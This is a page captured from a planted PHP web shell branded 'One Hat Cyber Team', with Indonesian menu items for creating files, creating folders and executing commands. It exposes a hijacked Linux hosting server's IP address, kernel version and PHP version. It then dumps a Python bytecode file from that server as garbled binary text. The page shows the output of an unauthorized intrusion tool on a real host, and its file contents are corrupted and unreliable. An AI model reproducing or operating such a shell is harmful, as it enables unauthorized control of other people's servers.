⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.221
Server IP:
97.74.87.16
Server:
Linux 16.87.74.97.host.secureserver.net 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib64
/
python3.9
/
ctypes
/
macholib
/
__pycache__
/
View File Name :
framework.cpython-39.opt-2.pyc
a �DOg� � @ s: d dl Z dgZe �d�Zdd� Zdd� Zedkr6e� dS )� N�framework_infoz�(?x) (?P<location>^.*)(?:^|/) (?P<name> (?P<shortname>\w+).framework/ (?:Versions/(?P<version>[^/]+)/)? (?P=shortname) (?:_(?P<suffix>[^_]+))? )$ c C s t �| �}|sd S |�� S )N)�STRICT_FRAMEWORK_RE�match� groupdict)�filenameZis_framework� r �1/usr/lib64/python3.9/ctypes/macholib/framework.pyr s c C s ddd�} d S )Nc S s t | ||||d�S )N��location�nameZ shortname�version�suffix)�dictr r r r �d- s �ztest_framework_info.<locals>.d)NNNNNr )r r r r �test_framework_info, s r �__main__)�re�__all__�compiler r r �__name__r r r r �<module> s